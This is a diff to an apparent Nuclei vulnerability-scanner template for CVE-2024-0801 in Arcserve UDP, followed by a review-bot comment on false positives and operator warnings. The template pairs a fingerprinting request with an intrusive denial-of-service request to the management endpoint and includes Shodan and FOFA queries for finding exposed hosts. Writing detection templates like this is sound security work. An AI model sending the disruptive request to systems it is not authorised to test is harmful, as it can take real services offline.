diff --git a/http/cves/2024/CVE-2024-0801.yaml b/http/cves/2024/CVE-2024-0801.yaml index 1356a7e2325..a49cf5026d0 100644 --- a/http/cves/2024/CVE-2024-0801.yaml +++ b/http/cves/2024/CVE-2024-0801.yaml @@ -17,13 +17,19 @@ info: cpe: cpe:2.3:a:arcserve:udp:*:*:*:*:*:*:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: arcserve product: udp shodan-query: http.favicon.hash:1015186617 fofa-query: icon_hash="1015186617" tags: cve,cve2024,arcserve,dos,intrusive,vkev +flow: http(1) && http(2) + +variables: + user: "{{to_lower(rand_base(6))}}" + pass: "{{to_lower(rand_base(6))}}" + http: - raw: - | @@ -31,17 +37,28 @@ http: Host: {{Hostname}} Content-Type: text/xml - \passworddomain + {{user}}{{pass}}domain - matchers-condition: and matchers: - - type: status - status: - - 503 - - 502 + - type: dsl + dsl: + - 'status_code == 500' + - 'contains(content_type, "text/xml")' + - 'contains(body, "Invalid user credentials")' + condition: and + internal: true - - type: word - part: body - words: - - "

Service Unavailable

" - - "

Proxy Error

" + - raw: + - | + POST /management/services/EdgeServiceConsoleImpl HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml + + \{{pass}}domain + + matchers: + - type: dsl + dsl: + - 'status_code == 503 && contains(body, "

Service Unavailable

")' + - 'status_code == 502 && contains(body, "

Proxy Error

")' + condition: or
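Review bot: The final matcher in the second `http` block accepts any 502 or 503 whose body is a generic proxy error page, so a gateway or upstream failure unrelated to the payload that occurs between `http(1)` and `http(2)` would be reported as a confirmed result; the `flow: http(1) && http(2)` gate added in the first hunk narrows that window but does not close it. Nothing in the visible lines tells an operator which request is the disruptive one, so I would add a comment above `flow:` such as `# http(1) only fingerprints the endpoint with random credentials; http(2) is the intrusive request and may leave the service unavailable`. The fingerprint in `http(1)` also depends on the English string `Invalid user credentials`, which presumably differs on localized installs and would make the template skip them silently; if that is accepted, it is worth saying so in a comment next to that matcher.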